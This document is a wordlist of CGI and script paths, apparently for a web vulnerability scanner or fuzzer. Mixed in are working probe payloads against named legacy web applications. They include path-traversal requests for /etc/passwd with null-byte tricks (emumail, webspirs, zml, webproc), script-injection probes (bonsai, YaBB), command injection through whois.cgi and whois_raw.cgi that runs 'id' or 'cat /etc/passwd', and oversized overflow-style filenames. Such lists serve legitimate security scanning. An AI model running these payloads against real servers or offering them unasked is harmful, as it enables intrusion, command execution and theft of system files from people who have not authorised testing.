cgi-bin/webgais
cgi-bin/webif.cgi
cgi-bin/webif/download.sh
cgi-bin/webif/status-processes.sh
cgi-bin/webif/system-acl.sh
cgi-bin/webif/system-crontabs.sh
cgi-bin/webif/system-services.sh
cgi-bin/webif/system-startup.sh
cgi-bin/webmail/html/emumail.cgi
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/webmain.cgi
cgi-bin/webmap.cgi
cgi-bin/webmo/build_molecule.cgi
cgi-bin/webmo/choose_engine.cgi
cgi-bin/webmo/directory_list.cgi
cgi-bin/webmo/execute_input.cgi
cgi-bin/webmo/export_molecule.cgi
cgi-bin/webmo/gamess.cgi
cgi-bin/webmo/huckel_orbitals.cgi
cgi-bin/webmo/import_job.cgi
cgi-bin/webmo/jobmgr.cgi
cgi-bin/webmo/login.cgi
cgi-bin/webmo/view_job.cgi
cgi-bin/webnews.exe
cgi-bin/webnews.pl
cgi-bin/webplus?about
cgi-bin/webplus.exe
cgi-bin/webplus.exe?about
cgi-bin/webproc
cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=bas_bpa
cgi-bin/webproc?getpage=/etc/passwd&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard
cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home
cgi-bin/webproc?getpage=/etc/passwd&var:language=es_es&var:page=
cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS")</script>)
cgi-bin/websendmail
cgi-bin/webspirs.cgi
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/websrunnings.cgi
cgi-bin/Web_Store/web_store.cgi
cgi-bin/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
cgi-bin/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/webutil.pl
cgi-bin/webutils.pl
cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script>
cgi-bin/webwho.pl
cgi-bin/wguest.exe
cgi-bin/whereami.cgi
cgi-bin/whois.cgi
cgi-bin/whois.cgi?action=load&whois=%3Bid
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois_raw.cgi
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/wifi_start.cgi
cgi-bin/wifi_stop.cgi
cgi-bin/wiki.pl
cgi-bin/windmail
cgi-bin/windmail.exe
cgi-bin/wowza.cgi
cgi-bin/wphpbb.cgi
cgi-bin/wrap
cgi-bin/wrap.cgi
cgi-bin/writefile.cgi
cgi-bin/writeVal.exe
cgi-bin/ws_ftp.ini
cgi-bin/.www_acl
cgi-bin/.wwwacl
cgi-bin/wwwadmin.pl
cgi-bin/wwwboard.cgi.cgi
cgi-bin/wwwboard.pl
cgi-bin/wwwboard/wwwboard.cgi
cgi-bin/www-sql
cgi-bin/wwwstats.pl
cgi-bin/wwwthreads/3tvars.pm
cgi-bin/wwwthreads/changedisplay.pl
cgi-bin/wwwthreads/previewpost.pl
cgi-bin/wwwthreads/w3tvars.pm
cgi-bin/wwwwais
cgi-bin/wxis.exe/iah/
cgi-bin/x309b3vq.pl
cgi-bin/xrisabhe.pl
cgi-bin/xtaccess.cgi
cgi-bin/xxxx
cgi-bin/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.pl
cgi-bin/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.plx
cgi-bin/yabb2/yabb.pl
cgi-bin/yabb2/YaBB.pl
cgi-bin/yabb.pl
cgi-bin/YaBB.pl
cgi-bin/YaBB/YaBB.cgi
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
cgi-bin/zbtest.cgi
cgi-bin.zip
cgi-bin/zml.cgi
cgi-bin/zml.cgi?file=../../../../../../../../../../etc
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/zsh
com/cgi-bin/emsgb/easymsgb.pl
cswebadm/diag/cgi-bin/nslookup.pl
cswebadm/diag/cgi-bin/sendrec.pl
dvp100/confd/docroot/cgi-bin/
fcgi-bin
fcgi-bin/
fcgi-bin/14all-1.1.cgi
fcgi-bin/14all.cgi
fcgi-bin/a1disp3.cgi
fcgi-bin/a1stats/a1disp3.cgi
fcgi-bin/a1stats/a1disp4.cgi
fcgi-bin/admin.cgi
fcgi-bin/anacondaclip.pl
fcgi-bin/apexec.pl
fcgi-bin/auktion.cgi
fcgi-bin/cal_make.pl
fcgi-bin/cgiforum.pl
fcgi-bin/commerce.cgi
fcgi-bin/dcforum.cgi
fcgi-bin/directorypro.cgi
fcgi-bin/dose.pl
fcgi-bin/echo
fcgi-bin/echo2
fcgi-bin/echo2.exe
fcgi-bin/echo.exe
fcgi-bin/emu/html/emumail.cgi
fcgi-bin/emumail.cgi
fcgi-bin/emumail/emumail.cgi
fcgi-bin/ezshopper/search.cgi
fcgi-bin/fileseek2.cgi
fcgi-bin/FileSeek2.cgi
fcgi-bin/fileseek.cgi
fcgi-bin/FileSeek.cgi
fcgi-bin/generate.cgi
fcgi-bin/gh.cgi
fcgi-bin/gH.cgi
fcgi-bin/hsx.cgi
fcgi-bin/imagefolio/admin/admin.cgi
fcgi-bin/ImageFolio/admin/admin.cgi
fcgi-bin/loadpage.cgi
fcgi-bin/magiccard.cgi
fcgi-bin/mail/emumail.cgi
fcgi-bin/mail/nph-mr.cgi
fcgi-bin/main.cgi
fcgi-bin/mrtg.cgi
fcgi-bin/netauth.cgi
fcgi-bin/newsdesk.cgi
fcgi-bin/nph-emumail.cgi
fcgi-bin/nph-showlogs.pl
fcgi-bin/pagelog.cgi
fcgi-bin/pfdispaly.cgi
fcgi-bin/powerup/r.cgi
fcgi-bin/printenv
fcgi-bin/quickstore.cgi
fcgi-bin/r.cgi
fcgi-bin/sbcgi/sitebuilder.cgi
fcgi-bin/search.pl
fcgi-bin/search/search.cgi
fcgi-bin/sendtemp.pl
fcgi-bin/shop.cgi
fcgi-bin/shopper.cgi
fcgi-bin/sojourn.cgi
fcgi-bin/store.cgi
fcgi-bin/store/index.cgi
fcgi-bin/story.pl
fcgi-bin/story/story.pl
fcgi-bin/talkback.cgi
fcgi-bin/technote/main.cgi
fcgi-bin/traffic.cgi
fcgi-bin/ttawebtop.cgi
fcgi-bin/ttawebtop.cgi/
fcgi-bin/ustorekeeper.pl
fcgi-bin/webmail/html/emumail.cgi
fcgi-bin/webspirs.cgi
fcgi-bin/wgsetcgi
fcgi-bin/yabb.pl
fcgi-bin/YaBB.pl
fcgi-bin/zml.cgi
forum/cgi-bin
gsdl/cgi-bin/library.cgi
hp_docs/cgi-bin/index.cgi
html/cgi-bin
html/cgi-bin/
html/cgi-bin/cgicso?query=aaa
~jed/cgi-bin/test.pl
jquery/cgi-bin
lcgi-bin
ldap/cgi-bin/ldacgi.exe
mxhelp/cgi-bin/namazucgi
nagios/cgi-bin/config.cgi
nagios/cgi-bin/status.cgi
nagios/cgi-bin/statuswml.cgi
np-cgi-bin
oem_webstage/cgi-bin/oemapp_cgi
pcgi-bin
private-cgi-bin
roads/cgi-bin/search.pl
ROADS/cgi-bin/search.pl
scgi-bin
scgi-bin/14all-1.1.cgi
scgi-bin/14all.cgi
scgi-bin/a1disp3.cgi
scgi-bin/a1stats/a1disp3.cgi
scgi-bin/a1stats/a1disp4.cgi
scgi-bin/admin.cgi
scgi-bin/anacondaclip.pl
scgi-bin/apexec.pl
scgi-bin/auktion.cgi
scgi-bin/cal_make.pl
scgi-bin/cgiforum.pl
scgi-bin/commerce.cgi
scgi-bin/dcforum.cgi
scgi-bin/directorypro.cgi
scgi-bin/dose.pl
scgi-bin/emu/html/emumail.cgi
scgi-bin/emumail.cgi
scgi-bin/emumail/emumail.cgi
scgi-bin/ezshopper/search.cgi
scgi-bin/fileseek2.cgi
scgi-bin/FileSeek2.cgi
scgi-bin/fileseek.cgi
scgi-bin/FileSeek.cgi
scgi-bin/generate.cgi
scgi-bin/gh.cgi
scgi-bin/gH.cgi
scgi-bin/hsx.cgi
scgi-bin/imagefolio/admin/admin.cgi
scgi-bin/ImageFolio/admin/admin.cgi
scgi-bin/loadpage.cgi
scgi-bin/magiccard.cgi
scgi-bin/mail/emumail.cgi
scgi-bin/mail/nph-mr.cgi
scgi-bin/main.cgi
scgi-bin/mrtg.cgi
scgi-bin/netauth.cgi
scgi-bin/newsdesk.cgi
scgi-bin/nph-emumail.cgi
scgi-bin/nph-showlogs.pl
scgi-bin/pagelog.cgi
scgi-bin/pfdispaly.cgi
scgi-bin/platform.cgi
scgi-bin/powerup/r.cgi
scgi-bin/quickstore.cgi
scgi-bin/r.cgi
scgi-bin/sbcgi/sitebuilder.cgi
scgi-bin/search.pl
scgi-bin/search/search.cgi
scgi-bin/sendtemp.pl
scgi-bin/shop.cgi
scgi-bin/shopper.cgi
scgi-bin/sojourn.cgi
scgi-bin/store.cgi
scgi-bin/store/index.cgi
scgi-bin/story.pl
scgi-bin/story/story.pl
scgi-bin/talkback.cgi
scgi-bin/technote/main.cgi
scgi-bin/traffic.cgi
scgi-bin/ttawebtop.cgi
scgi-bin/ttawebtop.cgi/
scgi-bin/ustorekeeper.pl
scgi-bin/webmail/html/emumail.cgi
scgi-bin/webspirs.cgi
scgi-bin/yabb.pl
scgi-bin/YaBB.pl
scgi-bin/zml.cgi
security.cgi-bin.php
tarantella/cgi-bin/modules.cgi
tarantella/cgi-bin/ttawebtop.cgi/
tscgi-bin
udataobj/webgui/cgi-bin/tuxadm.exe
uncgi-bin
vcgi-bin
vodnik/cgi-bin
web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr
web_reports/cgi-bin/InfoStation.cgi
www/cgi-bin/system.conf
